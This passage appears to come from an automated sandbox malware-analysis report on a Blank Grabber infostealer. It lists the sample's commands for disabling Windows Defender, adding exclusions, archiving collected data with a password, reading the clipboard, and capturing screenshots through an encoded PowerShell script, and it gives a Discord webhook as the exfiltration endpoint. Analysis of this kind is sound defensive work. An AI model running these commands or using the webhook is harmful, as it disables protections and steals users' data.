      • cmd.exe (PID: 1928 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6024 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5164 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7864 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7736 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgR5SCyIRovGkrea9pNRE2_V"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1680543056.0000028B92082000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000000.00000003.1680543056.0000028B92084000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000001.00000002.2024405519.000001BD43030000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000001.00000003.2017807345.000001BD43E2A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000001.00000002.2025939693.000001BD43230000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 5 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", ProcessId: 7496, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7504, ProcessName: cmd.exe
              Sigma detected: Rar Usage with Password and Compression Level
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *", ProcessId: 7920, ProcessName: cmd.exe
              Sigma detected: Suspicious Encoded PowerShell Command Line
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious PowerShell Encoded Command Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
              Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 8080, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Exclusion
